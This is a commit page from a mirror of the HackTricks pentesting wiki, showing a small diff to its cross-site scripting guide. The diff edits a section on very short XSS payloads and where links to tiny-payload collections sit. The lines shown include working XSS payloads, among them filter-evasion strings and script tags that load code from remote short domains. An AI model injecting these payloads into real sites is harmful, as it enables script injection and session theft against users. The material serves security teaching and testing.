0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [#3020] No subject

This commit is contained in:
CPol 2022-02-18 15:49:34 +00:00 committed by gitbook-bot
parent 15ca21d79a
commit 5b391bbae7
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 7 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
pentesting-web/xss-cross-site-scripting/README.md
View File

@ -170,11 +170,14 @@ onerror=alert`1`
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
```
### Length bypass (XSS in 20chars)
### Length bypass (small XSSs)
Taken from the blog of [Jorge Lajara](https://jlajara.gitlab.io/posts/2019/11/30/XSS\_20\_characters.html).
{% hint style="info" %}
**More tiny XSS for different environments** payload [**can be found here**](https://github.com/terjanq/Tiny-XSS-Payloads) and [**here**](https://tinyxss.terjanq.me).
{% endhint %}
```javascript
```html
<!-- Taken from the blog of Jorge Lajara -->
<svg/onload=alert``>
<script src=//aa.es>
<script src=//℡㏛.pw>
@ -182,8 +185,7 @@ Taken from the blog of [Jorge Lajara](https://jlajara.gitlab.io/posts/2019/11/30
The last one is using 2 unicode characters which expands to 5: telsr\
More of these characters can be found [here](https://www.unicode.org/charts/normalization/).\
To check in which characters are decomposed check [here](https://www.compart.com/en/unicode/U+2121).\
**More tiny XSS for different environments** payload [**can be found here**](https://github.com/terjanq/Tiny-XSS-Payloads) and [**here**](https://tinyxss.terjanq.me).
To check in which characters are decomposed check [here](https://www.compart.com/en/unicode/U+2121).
### Click XSS - Clickjacking